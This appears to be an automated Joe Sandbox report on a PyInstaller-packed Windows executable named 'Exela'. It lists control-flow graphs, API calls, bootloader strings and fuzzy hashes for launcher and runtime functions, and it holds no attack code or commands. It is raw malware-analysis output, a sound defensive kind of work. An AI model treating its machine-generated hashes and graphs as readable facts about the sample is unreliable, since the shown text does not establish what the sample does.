16346->16349 16358 7ff75aea4fbc 16347->16358 16351 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 16348->16351 16352 7ff75aeaf804 16349->16352 16353 7ff75aeaf7b6 16351->16353 16354 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 16352->16354 16353->16227 16355 7ff75aeaf80f 16354->16355 16355->16227 16356 7ff75aeaf82b 16356->16355 16357 7ff75aeb054c 51 API calls 16356->16357 16357->16356 16359 7ff75aea4fe0 16358->16359 16360 7ff75aea4fdb 16358->16360 16359->16360 16361 7ff75aeab1c0 __CxxCallCatchBlock 45 API calls 16359->16361 16360->16356 16362 7ff75aea4ffb 16361->16362 16366 7ff75aead9f4 16362->16366 16367 7ff75aea501e 16366->16367 16368 7ff75aeada09 16366->16368 16370 7ff75aeada60 16367->16370 16368->16367 16374 7ff75aeb3374 16368->16374 16371 7ff75aeada75 16370->16371 16372 7ff75aeada88 16370->16372 16371->16372 16387 7ff75aeb26c0 16371->16387 16372->16360 16375 7ff75aeab1c0 __CxxCallCatchBlock 45 API calls 16374->16375 16376 7ff75aeb3383 16375->16376 16377 7ff75aeb33ce 16376->16377 16386 7ff75aeb0348 EnterCriticalSection 16376->16386 16377->16367 16388 7ff75aeab1c0 __CxxCallCatchBlock 45 API calls 16387->16388 16389 7ff75aeb26c9 16388->16389

                                                                                                    Executed Functions

                                                                                                    Function 00007FF75AE98BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 7ff75ae98bd0-7ff75ae98d16 call 7ff75ae9c8c0 call 7ff75ae99400 SetConsoleCtrlHandler GetStartupInfoW call 7ff75aea5460 call 7ff75aeaa4ec call 7ff75aea878c call 7ff75aea5460 call 7ff75aeaa4ec call 7ff75aea878c call 7ff75aea5460 call 7ff75aeaa4ec call 7ff75aea878c GetCommandLineW CreateProcessW 23 7ff75ae98d18-7ff75ae98d38 GetLastError call 7ff75ae92c50 0->23 24 7ff75ae98d3d-7ff75ae98d79 RegisterClassW 0->24 31 7ff75ae99029-7ff75ae9904f call 7ff75ae9c5c0 23->31 26 7ff75ae98d81-7ff75ae98dd5 CreateWindowExW 24->26 27 7ff75ae98d7b GetLastError 24->27 29 7ff75ae98ddf-7ff75ae98de4 ShowWindow 26->29 30 7ff75ae98dd7-7ff75ae98ddd GetLastError 26->30 27->26 32 7ff75ae98dea-7ff75ae98dfa WaitForSingleObject 29->32 30->32 34 7ff75ae98e78-7ff75ae98e7f 32->34 35 7ff75ae98dfc 32->35 37 7ff75ae98ec2-7ff75ae98ec9 34->37 38 7ff75ae98e81-7ff75ae98e91 WaitForSingleObject 34->38 36 7ff75ae98e00-7ff75ae98e03 35->36 40 7ff75ae98e05 GetLastError 36->40 41 7ff75ae98e0b-7ff75ae98e12 36->41 44 7ff75ae98fb0-7ff75ae98fc9 GetMessageW 37->44 45 7ff75ae98ecf-7ff75ae98ee5 QueryPerformanceFrequency QueryPerformanceCounter 37->45 42 7ff75ae98fe8-7ff75ae98ff2 38->42 43 7ff75ae98e97-7ff75ae98ea7 TerminateProcess 38->43 40->41 41->38 46 7ff75ae98e14-7ff75ae98e31 PeekMessageW 41->46 49 7ff75ae99001-7ff75ae99025 GetExitCodeProcess CloseHandle * 2 42->49 50 7ff75ae98ff4-7ff75ae98ffa DestroyWindow 42->50 51 7ff75ae98eaf-7ff75ae98ebd WaitForSingleObject 43->51 52 7ff75ae98ea9 GetLastError 43->52 47 7ff75ae98fdf-7ff75ae98fe6 44->47 48 7ff75ae98fcb-7ff75ae98fd9 TranslateMessage DispatchMessageW 44->48 53 7ff75ae98ef0-7ff75ae98f28 MsgWaitForMultipleObjects PeekMessageW 45->53 54 7ff75ae98e33-7ff75ae98e64 TranslateMessage DispatchMessageW PeekMessageW 46->54 55 7ff75ae98e66-7ff75ae98e76 WaitForSingleObject 46->55 47->42 47->44 48->47 49->31 50->49 51->42 52->51 56 7ff75ae98f63-7ff75ae98f6a 53->56 57 7ff75ae98f2a 53->57 54->54 54->55 55->34 55->36 56->44 58 7ff75ae98f6c-7ff75ae98f95 QueryPerformanceCounter 56->58 59 7ff75ae98f30-7ff75ae98f61 TranslateMessage DispatchMessageW PeekMessageW 57->59 58->53 60 7ff75ae98f9b-7ff75ae98fa2 58->60 59->56 59->59 60->42 61 7ff75ae98fa4-7ff75ae98fa8 60->61 61->44
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                    • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                    • API String ID: 3832162212-3165540532
                                                                                                    • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                    • Instruction ID: 1ab73469522d9df8703f70ce5660bd6f590d1f319819d037a5ddd785809d90c5
                                                                                                    • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                    • Instruction Fuzzy Hash: 44D1E432A08B968AF710BF34E85A6ADB764FF84B58F884275DA5D43AA4DF3CD504C710
                                                                                                    Function 00007FF75AE91000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 62 7ff75ae91000-7ff75ae93806 call 7ff75ae9fe88 call 7ff75ae9fe90 call 7ff75ae9c8c0 call 7ff75aea5460 call 7ff75aea54f4 call 7ff75ae936b0 76 7ff75ae93814-7ff75ae93836 call 7ff75ae91950 62->76 77 7ff75ae93808-7ff75ae9380f 62->77 83 7ff75ae9391b-7ff75ae93931 call 7ff75ae945b0 76->83 84 7ff75ae9383c-7ff75ae93856 call 7ff75ae91c80 76->84 78 7ff75ae93c97-7ff75ae93cb2 call 7ff75ae9c5c0 77->78 89 7ff75ae93933-7ff75ae93960 call 7ff75ae97f80 83->89 90 7ff75ae9396a-7ff75ae9397f call 7ff75ae92710 83->90 88 7ff75ae9385b-7ff75ae9389b call 7ff75ae98a20 84->88 97 7ff75ae938c1-7ff75ae938cc call 7ff75aea4fa0 88->97 98 7ff75ae9389d-7ff75ae938a3 88->98 100 7ff75ae93962-7ff75ae93965 call 7ff75aea00bc 89->100 101 7ff75ae93984-7ff75ae939a6 call 7ff75ae91c80 89->101 102 7ff75ae93c8f 90->102 110 7ff75ae938d2-7ff75ae938e1 call 7ff75ae98a20 97->110 111 7ff75ae939fc-7ff75ae93a2a call 7ff75ae98b30 call 7ff75ae98b90 * 3 97->111 103 7ff75ae938af-7ff75ae938bd call 7ff75ae98b90 98->103 104 7ff75ae938a5-7ff75ae938ad 98->104 100->90 115 7ff75ae939b0-7ff75ae939b9 101->115 102->78 103->97 104->103 120 7ff75ae939f4-7ff75ae939f7 call 7ff75aea4fa0 110->120 121 7ff75ae938e7-7ff75ae938ed 110->121 138 7ff75ae93a2f-7ff75ae93a3e call 7ff75ae98a20 111->138 115->115 118 7ff75ae939bb-7ff75ae939d8 call 7ff75ae91950 115->118 118->88 127 7ff75ae939de-7ff75ae939ef call 7ff75ae92710 118->127 120->111 125 7ff75ae938f0-7ff75ae938fc 121->125 128 7ff75ae93905-7ff75ae93908 125->128 129 7ff75ae938fe-7ff75ae93903 125->129 127->102 128->120 132 7ff75ae9390e-7ff75ae93916 call 7ff75aea4fa0 128->132 129->125 129->128 132->138 141 7ff75ae93a44-7ff75ae93a47 138->141 142 7ff75ae93b45-7ff75ae93b53 138->142 141->142 143 7ff75ae93a4d-7ff75ae93a50 141->143 144 7ff75ae93a67 142->144 145 7ff75ae93b59-7ff75ae93b5d 142->145 146 7ff75ae93b14-7ff75ae93b17 143->146 147 7ff75ae93a56-7ff75ae93a5a 143->147 148 7ff75ae93a6b-7ff75ae93a90 call 7ff75aea4fa0 144->148 145->148 150 7ff75ae93b2f-7ff75ae93b40 call 7ff75ae92710 146->150 151 7ff75ae93b19-7ff75ae93b1d 146->151 147->146 149 7ff75ae93a60 147->149 157 7ff75ae93a92-7ff75ae93aa6 call 7ff75ae98b30 148->157 158 7ff75ae93aab-7ff75ae93ac0 148->158 149->144 159 7ff75ae93c7f-7ff75ae93c87 150->159 151->150 153 7ff75ae93b1f-7ff75ae93b2a 151->153 153->148 157->158 161 7ff75ae93ac6-7ff75ae93aca 158->161 162 7ff75ae93be8-7ff75ae93bfa call 7ff75ae98a20 158->162 159->102 164 7ff75ae93ad0-7ff75ae93ae8 call 7ff75aea52c0 161->164 165 7ff75ae93bcd-7ff75ae93be2 call 7ff75ae91940 161->165 171 7ff75ae93bfc-7ff75ae93c02 162->171 172 7ff75ae93c2e 162->172 175 7ff75ae93b62-7ff75ae93b7a call 7ff75aea52c0 164->175 176 7ff75ae93aea-7ff75ae93b02 call 7ff75aea52c0 164->176 165->161 165->162 173 7ff75ae93c04-7ff75ae93c1c 171->173 174 7ff75ae93c1e-7ff75ae93c2c 171->174 177 7ff75ae93c31-7ff75ae93c40 call 7ff75aea4fa0 172->177 173->177 174->177 184 7ff75ae93b87-7ff75ae93b9f call 7ff75aea52c0 175->184 185 7ff75ae93b7c-7ff75ae93b80 175->185 176->165 186 7ff75ae93b08-7ff75ae93b0f 176->186 187 7ff75ae93d41-7ff75ae93d63 call 7ff75ae944d0 177->187 188 7ff75ae93c46-7ff75ae93c4a 177->188 197 7ff75ae93ba1-7ff75ae93ba5 184->197 198 7ff75ae93bac-7ff75ae93bc4 call 7ff75aea52c0 184->198 185->184 186->165 201 7ff75ae93d71-7ff75ae93d82 call 7ff75ae91c80 187->201 202 7ff75ae93d65-7ff75ae93d6f call 7ff75ae94620 187->202 190 7ff75ae93c50-7ff75ae93c5f call 7ff75ae990e0 188->190 191 7ff75ae93cd4-7ff75ae93ce6 call 7ff75ae98a20 188->191 204 7ff75ae93c61 190->204 205 7ff75ae93cb3-7ff75ae93cb6 call 7ff75ae98850 190->205 206 7ff75ae93d35-7ff75ae93d3c 191->206 207 7ff75ae93ce8-7ff75ae93ceb 191->207 197->198 198->165 219 7ff75ae93bc6 198->219 210 7ff75ae93d87-7ff75ae93d96 201->210 202->210 213 7ff75ae93c68 call 7ff75ae92710 204->213 218 7ff75ae93cbb-7ff75ae93cbd 205->218 206->213 207->206 214 7ff75ae93ced-7ff75ae93d10 call 7ff75ae91c80 207->214 216 7ff75ae93dc4-7ff75ae93dda call 7ff75ae99400 210->216 217 7ff75ae93d98-7ff75ae93d9f 210->217 226 7ff75ae93c6d-7ff75ae93c77 213->226 230 7ff75ae93d12-7ff75ae93d26 call 7ff75ae92710 call 7ff75aea4fa0 214->230 231 7ff75ae93d2b-7ff75ae93d33 call 7ff75aea4fa0 214->231 234 7ff75ae93de8-7ff75ae93e04 SetDllDirectoryW 216->234 235 7ff75ae93ddc 216->235 217->216 222 7ff75ae93da1-7ff75ae93da5 217->222 224 7ff75ae93cbf-7ff75ae93cc6 218->224 225 7ff75ae93cc8-7ff75ae93ccf 218->225 219->165 222->216 228 7ff75ae93da7-7ff75ae93dbe SetDllDirectoryW LoadLibraryExW 222->228 224->213 225->210 226->159 228->216 230->226 231->210 238 7ff75ae93f01-7ff75ae93f08 234->238 239 7ff75ae93e0a-7ff75ae93e19 call 7ff75ae98a20 234->239 235->234 241 7ff75ae93ffc-7ff75ae94004 238->241 242 7ff75ae93f0e-7ff75ae93f15 238->242 251 7ff75ae93e32-7ff75ae93e3c call 7ff75aea4fa0 239->251 252 7ff75ae93e1b-7ff75ae93e21 239->252 246 7ff75ae94006-7ff75ae94023 PostMessageW GetMessageW 241->246 247 7ff75ae94029-7ff75ae9405b call 7ff75ae936a0 call 7ff75ae93360 call 7ff75ae93670 call 7ff75ae96fb0 call 7ff75ae96d60 241->247 242->241 245 7ff75ae93f1b-7ff75ae93f25 call 7ff75ae933c0 242->245 245->226 259 7ff75ae93f2b-7ff75ae93f3f call 7ff75ae990c0 245->259 246->247 261 7ff75ae93ef2-7ff75ae93efc call 7ff75ae98b30 251->261 262 7ff75ae93e42-7ff75ae93e48 251->262 256 7ff75ae93e23-7ff75ae93e2b 252->256 257 7ff75ae93e2d-7ff75ae93e2f 252->257 256->257 257->251 271 7ff75ae93f41-7ff75ae93f5e PostMessageW GetMessageW 259->271 272 7ff75ae93f64-7ff75ae93fa0 call 7ff75ae98b30 call 7ff75ae98bd0 call 7ff75ae96fb0 call 7ff75ae96d60 call 7ff75ae98ad0 259->272 261->238 262->261 266 7ff75ae93e4e-7ff75ae93e54 262->266 269 7ff75ae93e5f-7ff75ae93e61 266->269 270 7ff75ae93e56-7ff75ae93e58 266->270 269->238 274 7ff75ae93e67-7ff75ae93e83 call 7ff75ae96db0 call 7ff75ae97330 269->274 270->274 275 7ff75ae93e5a 270->275 271->272 307 7ff75ae93fa5-7ff75ae93fa7 272->307 290 7ff75ae93e85-7ff75ae93e8c 274->290 291 7ff75ae93e8e-7ff75ae93e95 274->291 275->238 293 7ff75ae93edb-7ff75ae93ef0 call 7ff75ae92a50 call 7ff75ae96fb0 call 7ff75ae96d60 290->293 294 7ff75ae93eaf-7ff75ae93eb9 call 7ff75ae971a0 291->294 295 7ff75ae93e97-7ff75ae93ea4 call 7ff75ae96df0 291->295 293->238 305 7ff75ae93ec4-7ff75ae93ed2 call 7ff75ae974e0 294->305 306 7ff75ae93ebb-7ff75ae93ec2 294->306 295->294 304 7ff75ae93ea6-7ff75ae93ead 295->304 304->293 305->238 319 7ff75ae93ed4 305->319 306->293 310 7ff75ae93fe9-7ff75ae93ff7 call 7ff75ae91900 307->310 311 7ff75ae93fa9-7ff75ae93fb3 call 7ff75ae99200 307->311 310->226 311->310 321 7ff75ae93fb5-7ff75ae93fca 311->321 319->293 322 7ff75ae93fe4 call 7ff75ae92a50 321->322 323 7ff75ae93fcc-7ff75ae93fdf call 7ff75ae92710 call 7ff75ae91900 321->323 322->310 323->226
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastModuleName
                                                                                                    • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                    • API String ID: 2776309574-4232158417
                                                                                                    • Opcode ID: 230e5f2fbe18b706386c2e6c5de042c78cdf1bdf29ac743ce162c0a9040f007d
                                                                                                    • Instruction ID: b69eaa1dd3331475563e73e66bf5e4f1996367c321b0537a7c0a8e22d49e240b
                                                                                                    • Opcode Fuzzy Hash: 230e5f2fbe18b706386c2e6c5de042c78cdf1bdf29ac743ce162c0a9040f007d
                                                                                                    • Instruction Fuzzy Hash: F932AF21A0C7A759FA24B720945A7F9E691AF44B84FCC41B6DA5D432D2EF3CE954C330
                                                                                                    Function 00007FF75AEB5C70 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 477 7ff75aeb5c70-7ff75aeb5cab call 7ff75aeb55f8 call 7ff75aeb5600 call 7ff75aeb5668 484 7ff75aeb5cb1-7ff75aeb5cbc call 7ff75aeb5608 477->484 485 7ff75aeb5ed5-7ff75aeb5f21 call 7ff75aeaa970 call 7ff75aeb55f8 call 7ff75aeb5600 call 7ff75aeb5668 477->485 484->485 491 7ff75aeb5cc2-7ff75aeb5ccc 484->491 510 7ff75aeb605f-7ff75aeb60cd call 7ff75aeaa970 call 7ff75aeb15e8 485->510 511 7ff75aeb5f27-7ff75aeb5f32 call 7ff75aeb5608 485->511 492 7ff75aeb5cee-7ff75aeb5cf2 491->492 493 7ff75aeb5cce-7ff75aeb5cd1 491->493 497 7ff75aeb5cf5-7ff75aeb5cfd 492->497 496 7ff75aeb5cd4-7ff75aeb5cdf 493->496 499 7ff75aeb5ce1-7ff75aeb5ce8 496->499 500 7ff75aeb5cea-7ff75aeb5cec 496->500 497->497 501 7ff75aeb5cff-7ff75aeb5d12 call 7ff75aead66c 497->501 499->496 499->500 500->492 503 7ff75aeb5d1b-7ff75aeb5d29 500->503 508 7ff75aeb5d14-7ff75aeb5d16 call 7ff75aeaa9b8 501->508 509 7ff75aeb5d2a-7ff75aeb5d36 call 7ff75aeaa9b8 501->509 508->503 518 7ff75aeb5d3d-7ff75aeb5d45 509->518 531 7ff75aeb60cf-7ff75aeb60d6 510->531 532 7ff75aeb60db-7ff75aeb60de 510->532 511->510 520 7ff75aeb5f38-7ff75aeb5f43 call 7ff75aeb5638 511->520 518->518 521 7ff75aeb5d47-7ff75aeb5d58 call 7ff75aeb04e4 518->521 520->510 529 7ff75aeb5f49-7ff75aeb5f6c call 7ff75aeaa9b8 GetTimeZoneInformation 520->529 521->485 530 7ff75aeb5d5e-7ff75aeb5db4 call 7ff75aeba540 * 4 call 7ff75aeb5b8c 521->530 548 7ff75aeb5f72-7ff75aeb5f93 529->548 549 7ff75aeb6034-7ff75aeb605e call 7ff75aeb55f0 call 7ff75aeb55e0 call 7ff75aeb55e8 529->549 589 7ff75aeb5db6-7ff75aeb5dba 530->589 533 7ff75aeb616b-7ff75aeb616e 531->533 535 7ff75aeb60e0 532->535 536 7ff75aeb6115-7ff75aeb6128 call 7ff75aead66c 532->536 539 7ff75aeb60e3 533->539 540 7ff75aeb6174-7ff75aeb617c call 7ff75aeb5c70 533->540 535->539 553 7ff75aeb6133-7ff75aeb614e call 7ff75aeb15e8 536->553 554 7ff75aeb612a 536->554 546 7ff75aeb60e8-7ff75aeb6114 call 7ff75aeaa9b8 call 7ff75ae9c5c0 539->546 547 7ff75aeb60e3 call 7ff75aeb5eec 539->547 540->546 547->546 556 7ff75aeb5f95-7ff75aeb5f9b 548->556 557 7ff75aeb5f9e-7ff75aeb5fa5 548->557 577 7ff75aeb6150-7ff75aeb6153 553->577 578 7ff75aeb6155-7ff75aeb6167 call 7ff75aeaa9b8 553->578 563 7ff75aeb612c-7ff75aeb6131 call 7ff75aeaa9b8 554->563 556->557 558 7ff75aeb5fb9 557->558 559 7ff75aeb5fa7-7ff75aeb5faf 557->559 568 7ff75aeb5fbb-7ff75aeb602f call 7ff75aeba540 * 4 call 7ff75aeb2bcc call 7ff75aeb6184 * 2 558->568 559->558 565 7ff75aeb5fb1-7ff75aeb5fb7 559->565 563->535 565->568 568->549 577->563 578->533 591 7ff75aeb5dc0-7ff75aeb5dc4 589->591 592 7ff75aeb5dbc 589->592 591->589 594 7ff75aeb5dc6-7ff75aeb5deb call 7ff75aea6bc8 591->594 592->591 600 7ff75aeb5dee-7ff75aeb5df2 594->600 602 7ff75aeb5e01-7ff75aeb5e05 600->602 603 7ff75aeb5df4-7ff75aeb5dff 600->603 602->600 603->602 605 7ff75aeb5e07-7ff75aeb5e0b 603->605 608 7ff75aeb5e0d-7ff75aeb5e35 call 7ff75aea6bc8 605->608 609 7ff75aeb5e8c-7ff75aeb5e90 605->609 617 7ff75aeb5e53-7ff75aeb5e57 608->617 618 7ff75aeb5e37 608->618 610 7ff75aeb5e92-7ff75aeb5e94 609->610 611 7ff75aeb5e97-7ff75aeb5ea4 609->611 610->611 613 7ff75aeb5ebf-7ff75aeb5ece call 7ff75aeb55f0 call 7ff75aeb55e0 611->613 614 7ff75aeb5ea6-7ff75aeb5ebc call 7ff75aeb5b8c 611->614 613->485 614->613 617->609 623 7ff75aeb5e59-7ff75aeb5e77 call 7ff75aea6bc8 617->623 621 7ff75aeb5e3a-7ff75aeb5e41 618->621 621->617 624 7ff75aeb5e43-7ff75aeb5e51 621->624 629 7ff75aeb5e83-7ff75aeb5e8a 623->629 624->617 624->621 629->609 630 7ff75aeb5e79-7ff75aeb5e7d 629->630 630->609 631 7ff75aeb5e7f 630->631 631->629
                                                                                                    APIs
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF75AEB5CB5
                                                                                                      • Part of subcall function 00007FF75AEB5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75AEB561C
                                                                                                      • Part of subcall function 00007FF75AEAA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF75AEB2D92,?,?,?,00007FF75AEB2DCF,?,?,00000000,00007FF75AEB3295,?,?,?,00007FF75AEB31C7), ref: 00007FF75AEAA9CE
                                                                                                      • Part of subcall function 00007FF75AEAA9B8: GetLastError.KERNEL32(?,?,?,00007FF75AEB2D92,?,?,?,00007FF75AEB2DCF,?,?,00000000,00007FF75AEB3295,?,?,?,00007FF75AEB31C7), ref: 00007FF75AEAA9D8
                                                                                                      • Part of subcall function 00007FF75AEAA970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF75AEAA94F,?,?,?,?,?,00007FF75AEAA83A), ref: 00007FF75AEAA979
                                                                                                      • Part of subcall function 00007FF75AEAA970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF75AEAA94F,?,?,?,?,?,00007FF75AEAA83A), ref: 00007FF75AEAA99E
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF75AEB5CA4
                                                                                                      • Part of subcall function 00007FF75AEB5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75AEB567C
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF75AEB5F1A
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF75AEB5F2B
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF75AEB5F3C
                                                                                                    • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF75AEB617C), ref: 00007FF75AEB5F63
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                    • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                    • API String ID: 4070488512-239921721
                                                                                                    • Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                    • Instruction ID: 693fde1b50c7a2a4b3a3d98dc106139f1c519a3e5693e51a6896f1a163118426
                                                                                                    • Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                    • Instruction Fuzzy Hash: 7CD1B032A0836686FB20FF25D45A1B9A751EF44784FCC8276EA4E47695DF3CE8428770
                                                                                                    Function 00007FF75AEB69D4 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 691 7ff75aeb69d4-7ff75aeb6a47 call 7ff75aeb6708 694 7ff75aeb6a61-7ff75aeb6a6b call 7ff75aea8590 691->694 695 7ff75aeb6a49-7ff75aeb6a52 call 7ff75aea4f58 691->695 700 7ff75aeb6a86-7ff75aeb6aef CreateFileW 694->700 701 7ff75aeb6a6d-7ff75aeb6a84 call 7ff75aea4f58 call 7ff75aea4f78 694->701 702 7ff75aeb6a55-7ff75aeb6a5c call 7ff75aea4f78 695->702 705 7ff75aeb6af1-7ff75aeb6af7 700->705 706 7ff75aeb6b6c-7ff75aeb6b77 GetFileType 700->706 701->702 713 7ff75aeb6da2-7ff75aeb6dc2 702->713 711 7ff75aeb6b39-7ff75aeb6b67 GetLastError call 7ff75aea4eec 705->711 712 7ff75aeb6af9-7ff75aeb6afd 705->712 708 7ff75aeb6b79-7ff75aeb6bb4 GetLastError call 7ff75aea4eec CloseHandle 706->708 709 7ff75aeb6bca-7ff75aeb6bd1 706->709 708->702 725 7ff75aeb6bba-7ff75aeb6bc5 call 7ff75aea4f78 708->725 716 7ff75aeb6bd3-7ff75aeb6bd7 709->716 717 7ff75aeb6bd9-7ff75aeb6bdc 709->717 711->702 712->711 718 7ff75aeb6aff-7ff75aeb6b37 CreateFileW 712->718 723 7ff75aeb6be2-7ff75aeb6c37 call 7ff75aea84a8 716->723 717->723 724 7ff75aeb6bde 717->724 718->706 718->711 730 7ff75aeb6c56-7ff75aeb6c87 call 7ff75aeb6488 723->730 731 7ff75aeb6c39-7ff75aeb6c45 call 7ff75aeb6910 723->731 724->723 725->702 737 7ff75aeb6c89-7ff75aeb6c8b 730->737 738 7ff75aeb6c8d-7ff75aeb6ccf 730->738 731->730 736 7ff75aeb6c47 731->736 739 7ff75aeb6c49-7ff75aeb6c51 call 7ff75aeaab30 736->739 737->739 740 7ff75aeb6cf1-7ff75aeb6cfc 738->740 741 7ff75aeb6cd1-7ff75aeb6cd5 738->741 739->713 744 7ff75aeb6d02-7ff75aeb6d06 740->744 745 7ff75aeb6da0 740->745 741->740 743 7ff75aeb6cd7-7ff75aeb6cec 741->743 743->740 744->745 747 7ff75aeb6d0c-7ff75aeb6d51 CloseHandle CreateFileW 744->747 745->713 748 7ff75aeb6d86-7ff75aeb6d9b 747->748 749 7ff75aeb6d53-7ff75aeb6d81 GetLastError call 7ff75aea4eec call 7ff75aea86d0 747->749 748->745 749->748
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
